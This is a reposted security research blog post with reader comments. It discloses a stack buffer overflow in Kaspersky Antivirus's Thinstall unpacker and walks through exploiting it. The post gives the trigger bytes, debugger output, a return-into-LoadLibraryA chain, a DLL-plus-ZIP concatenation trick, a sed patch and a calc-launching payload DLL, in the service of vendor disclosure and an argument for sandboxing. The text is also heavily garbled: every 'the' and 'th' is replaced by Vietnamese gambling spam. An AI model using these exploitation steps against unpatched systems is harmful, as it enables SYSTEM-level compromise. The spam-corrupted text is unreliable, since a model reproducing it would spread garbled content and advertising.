Tuesday, September 22, 2015

Kaspersky: Mo Unpackers, Mo Problems.

Posted by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 notorious Tavis Ormandy.


We’ve talked before about how we use Google scale to amplify our fuzzing efforts. I’ve recently been working on applying some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se techniques to Antivirus, a vast and highly privileged attack surface.


Among cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 products I’m working on is Kaspersky Antivirus, and I’m currently triaging and analyzing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first round of vulnerabilities I’ve collected. As well as fuzzing, I’ve been auditing and reviewing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 design, resulting in identifying multiple major flaws that Kaspersky are actively working on resolving. These issues affect everything from network intrusion detection, ssl interception and file scanning to browser integration and local privilege escalation.


Many of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 reports I’ve filed are still unfixed, but Kaspersky has made enough progress that I can talk about some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 issues. One notable observation from this work was that some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most critical vulnerabilities I’ve been submitting were simply too easy to exploit, and I’m happy to report that Kaspersky are rolling out some improved mitigations to resolve that.


Some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bugs Kaspersky has already resolved include vulnerabilities parsing everything from Android DEX files and Microsoft CHM documents to unpacking UPX and Yoda’s Protector. We’ve sent dozens of reports to Kaspersky to investigate, any of which could result in a complete compromise of any Kaspersky Antivirus user.


Let’s examine one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 issues in more detail. For this first issue, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 release date of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 definitions in Kaspersky Antivirus (or any ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r products using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Kaspersky engine, such as ZoneAlarm) is after 7-Sep-2015, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability described below is already resolved.


Because antivirus products typically intercept filesystem and network traffic, simply visiting a website or receiving an email is sufficient for exploitation. It is not necessary to open or read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 email, as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filesystem I/O from receiving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 email is sufficient to trigger cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploitable condition.


Sample Vulnerability: Thinstall Containers


Thinstall containers are virtualization wrappers around applications to simplify distribution. The product was acquired by VMware in 2008 and renamed VMware ThinApp. Kaspersky attempts to unpack thinstall version 4 containers to scan cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contents when it encounters one. Thinstall applications can be recognised by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 magic constants at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir entry point.

pushf
pusha
push 0x6C417453
push 0x6E496854
call $+5
This code triggers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 thinstall unpacker in Kaspersky.


Fuzzing thinstall applications revealed a stack buffer overflow extracting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 container contents. Because Kaspersky did not enable /GS, it is possible to overwrite cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stack frame and redirect execution quite simply. Support for /GS was first introduced in Visual Studio 2002, and has been enabled by default for many years. It is possible to disable /GS in your build configuration, but it would be an exceptionally bad idea to do so.


By extracting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 container record responsible for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 overflow, it didn’t take long to reliably gain control of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 instruction pointer.


(8f0.b28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0be4005c ecx=09f9d810 edx=00000000 esi=0be4005c edi=0d90ef64
eip=41414141 esp=09f9dc5c ebp=43434343 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
41414141 ??              ???
0:084> lmv m avp
start    end        module name
013d0000 01401000   avp        (deferred)             
   Image path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\avp.exe
   Image name: avp.exe
   Timestamp:        Thu Jul 23 11:39:44 2015 (55B134F0)
   CheckSum:         00036438
   ImageSize:        00031000
   File version:     16.0.0.625
   Product version:  16.0.0.625
   File flags:       0 (Mask 3F)
   File OS:          40004 NT Win32
   File type:        1.0 App
   File date:        00000000.00000000
   Translations:     0409.04b0
   CompanyName:      Kaspersky Lab ZAO
   ProductName:      Kaspersky Anti-Virus
   InternalName:     avp
   OriginalFilename: avp.exe
   ProductVersion:   16.0.0.625
   FileVersion:      16.0.0.625
   FileDescription:  Kaspersky Anti-Virus
   LegalCopyright:   © 2015 Kaspersky Lab ZAO. All Rights Reserved.
   LegalTrademarks:  Registered trademarks and service marks are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 property of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir respective owners


Exploitation


Kaspersky have enabled /DYNAMICBASE for all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir modules which should make exploitation unreliable. Unfortunately, a few implementation flaws prevented it from working properly. Multiple PAGE_EXECUTE_READWRITE mappings are created at predictable locations for dynamic code using VirtualAlloc().


0:117> !address 0x7e670000
Usage:                  
Base Address:           7e670000
End Address:            7e671000
Region Size:            00001000
State:                  00001000 MEM_COMMIT
Protect:                00000040 PAGE_EXECUTE_READWRITE
Type:                   00020000 MEM_PRIVATE
Allocation Base:        7e670000
Allocation Protect:     00000040 PAGE_EXECUTE_READWRITE


I dumped cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contents of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pages using .writemem, and quickly found a stub for calling kernel32!LoadLibraryA.


0:001> u 0x7e670470
7e670470 58              pop     eax
7e670471 688f49db76      push    offset kernel32!LoadLibraryA (76db498f)
7e670476 c3              ret
7e670477 cc              int     3
7e670478 55              push    ebp
7e670479 8bec            mov     ebp,esp
7e67047b 81ecb0000000    sub     esp,0B0h
7e670481 833d5cff686800  cmp     dword ptr [ushata!UshataInitializeForService+0x1639c (6868ff5c)],0


This would be a useful primitive for exploitation if we could control cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parameters, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is no way to know where any useful strings are located. I guessed that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename that’s being scanned must be somewhere on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stack. After dumping cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stack with dda I found it at [esp+0x8f*4].


0:124> dda esp+8e*4 L1
0c85e4cc  0ba21fb8 "C:\exploit.txt"


Note that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename or extension being scanned doesn’t matter, I used .txt.


If I could get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit to look like a valid DLL, I could return into LoadLibrary and get it to invoke DllMain(). This code would cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n be loaded into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 address space of avp.exe and execute with NT AUTHORITY\SYSTEM privileges.


I built a simple chain to clear cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stack and return into LoadLibraryA, and it worked beautifully.


0:124> dda esp L8f
0c85e294  00000000
0c85e298  7e670471 "h.I.v..U....."
0c85e29c  00000000
0c85e2a0  7e670471 "h.I.v..U....."
0c85e2a4  00000000
0c85e2a8  7e670471 "h.I.v..U....."
0c85e2ac  00000000
0c85e4c8  7e670471 "h.I.v..U....."
...
0c85e4cc  0ba21fb8 "C:\exploit.txt"


Unfortunately cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Windows loader is very strict about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 format of DLL’s, and I was unable to get it to accept cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit and still trigger cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability in Kaspersky. This might be possible given more time, but I came up with an alternative strategy instead.


Channelling Corkami


I had already noticed that Kaspersky will scan archives appended to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r files.


$ cat file.doc file.zip > newfile.doc


So in this case, Kaspersky would spot that a ZIP archive had been appended to a office document, and extract and scan cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contents. I wondered if it was possible to put my exploit in a ZIP file, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n append it to a DLL, like this:


$ cat payload.dll exploit.zip > finalexploit.txt

This would mean Kaspersky would see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ZIP file appended to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DLL and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n scan my exploit, but Windows would see a valid DLL. Note that filenames and extensions don’t matter here, it is perfectly legal to LoadLibrary(“anything.txt”).


I was able to trigger cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit this way, but unfortunately cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stack was now written differently! When scanning inside an archive Kaspersky renders cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename like this:


C:\exploit.zip//exploit.txt


That is not a pathname that LoadLibraryA would accept. My solution was to modify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 zip header to name cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file “”, i.e. an empty string, when Kaspersky produces cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename it appends cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 empty string and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename is still a valid target for LoadLibraryA.


I just used sed like this:


$ sed -i 's/e\(xploit.txt\)/\x00\1/' exploit.zip
I wrote a quick payload dll to load:


$ cat wrapper.c
#include

#pragma comment(lib, "shell32")

BOOLEAN WINAPI DllMain(HINSTANCE hDllHandle, DWORD nReason, LPVOID Reserved)
{
   ShellExecute(NULL, "open", "calc", NULL, NULL, 0);
   ExitProcess(0);
   return 1;
}
And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit worked beautifully first time.


Windows 7-2015-09-04-19-35-34.png


I verified cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit worked on version 15 and 16 of Kaspersky Antivirus on Windows 7. Note that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 calculator is displayed on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Service Desktop, so you will need to use Process Explorer to verify it was created.

Product Design Flaws


I’ve also reported some major design flaws in various ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r components of Kaspersky Antivirus and Kaspersky Internet Security. The patches for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 remote network attacks I had planned to discuss here were delayed, and so I’ll talk about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m in a second post on this topic once cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fixes are live.


Security  Software Considered Harmful?


We have strong evidence that an active black market trade in antivirus exploits exists. Research shows that it’s an easily accessible attack surface that dramatically increases exposure to targeted attacks.


Snippet of an exploit pricelist uncovered by WikiLeaks, source. The pricelist demonstrates that anti virus exploits and information  are actively traded.


For this reason, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendors of security products have a responsibility to uphold cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 highest secure development standards possible to minimise cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 potential for harm caused by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir software.


Ignoring cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 question of efficacy, attempting to reduce one’s exposure to opportunistic malware should not result in an increased exposure to targeted attacks.


Conclusion


In future, we would like to see antivirus unpackers, emulators and parsers sandboxed, not run with SYSTEM privileges. The chromium sandbox is open source and used in multiple major products. Don’t wait for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 network worm that targets your product, or for targeted attacks against your users, add sandboxing to your development roadmap today.


I’ve previously written about Sophos and ESET, but plan to research ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r vendors soon.

Thanks to Kaspersky for record breaking response times when handling this report, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y’ve set a high bar to beat for ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r vendors! More Kaspersky issues, including multiple remote code execution vulnerabilities, should be fixed and visible in our issue tracker over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next few weeks.

17 comments:

  1. Amazing job Tavis! Congratulations.

    I think its possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analisys, no?

    Regards!

    Marco

    ReplyDelete
    Replies
    1. > I think its possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analisys, no?

      Yes, just have a look at wireshark and how many security bugs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have.

      Delete
  2. More brilliant work by T.O.

    Parsing of complex data files is a common source of vulnerabilities. Has anyone attempted to make a source code collection of secure file parsers for formats like CHM, DEX and UPX, not to mention PDF, all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 graphics formats, etc.?

    >>Kaspersky did not enable /GS...

    WTF?!?! In fact, as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author goes on to say, it appears that Kaspersky actively disabled /GS

    >>In future, we would like to see antivirus unpackers, emulators and parsers sandboxed, not run with SYSTEM privileges.

    Absolutely.

    ReplyDelete
    Replies
    1. Most likely cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n had VS projects dating back when /GS was not available and importing in a newer VS version let /GS on off. I know it had happened to me as well.

      Delete
  3. > I think its possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analisys, no?

    Yes, parsers anywhere can have bugs, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y're especially concerning in widely-used programs with system-level privileges that are expected to run on potentially malicious content.

    ReplyDelete
  4. What do you mean by "Service Desktop"? Google search turned up no results for me.

    ReplyDelete
    Replies
    1. Calc spawned by avp.exe is executed on special services session and can't interact with users desktop.
      This is starting from Vista. XP and prior was able to interact with desktop.

      Delete
    2. Probably cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "desktop" for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SYSTEM account on Windows, which you normally wouldn't be able to see. Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r way to say it is that it's launched in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 context of a different user.

      Delete
    3. Every user in windows has its own visible desktop. Sometimes referred as shell. You can experience that with user switching (not logging off).
      The system is a seperate user in every windows system and has its own (usually not visible ) desktop. On that desktop -belonging to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 system user- is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 calculator started. For example UAC is happening on that system desktop. During UAC a desktop switch occurs and a Screenshot of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user desktop is displayed as dark background
      Picture with only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 messagebox showed asking for permissions on that system desktop.

      Delete
    4. On windows, services are prevented from accessing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user's desktop for security reasons. So for compatibility reasons, any service that tries to access cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 desktop automatically gets re-directed to a special "desktop" specifically for that service, that you normally can't see but through some trickery can switch to and see w/e UI cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 service showed.

      Delete
    5. The desktop associated with service account (most likely LocalSystem or so), as opposed with desktop named "Default" (minus quotes) that is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 one cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user sees (and user program runs).
      See https://msdn.microsoft.com/en-us/library/windows/desktop/ms687105(v=vs.85).aspx

      Delete
    6. The calculator itself can't be seen on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 desktop, because it's being opened on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Desktop of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user account that runs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 service.

      Delete
    7. I think you have to look for "session 0 isolation"
      http://blogs.technet.com/b/askperf/archive/2007/04/27/application-compatibility-session-0-isolation.aspx

      Delete
  5. Scanning files in a non memory safe language or outside of an effective sand box is horrible. AV will scan files as soon as a flash drive is connected, so having av installed is currently a bad idea if you care about security.

    ReplyDelete
  6. [quote]This would mean Kaspersky would see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ZIP file appended to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DLL and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n scan my exploit, but Windows would see a valid DLL. [/quote]

    Why would Windows "see" cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 valid DLL and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n execute it from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re? While Kaspersky (or any AV) is scanning, we expect it to read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data without executing it as code. I know it's code, but it should be assumed to be malicious and treated as data at least until scanning is finished. (Sorry, I'm not a Windows dev, but this is fundamentally bad, no?)

    ReplyDelete
  7. Why is Windows automagically executing code that is being read to scan for malicious code? Windows just "sees" that it's a DLL (ie: code) and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n immediately executes before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scanner can finish scanning? C'mon that's bad!!!

    So, this payload seems like it could be delivered by spam as an innocent looking .txt file, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 virus scanner will do cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rest while scanning email attachments.

    ReplyDelete
  8. Your exploit worked in Windows 7. Would it work in Windows 10 or with EMET installed and enabled?

    ReplyDelete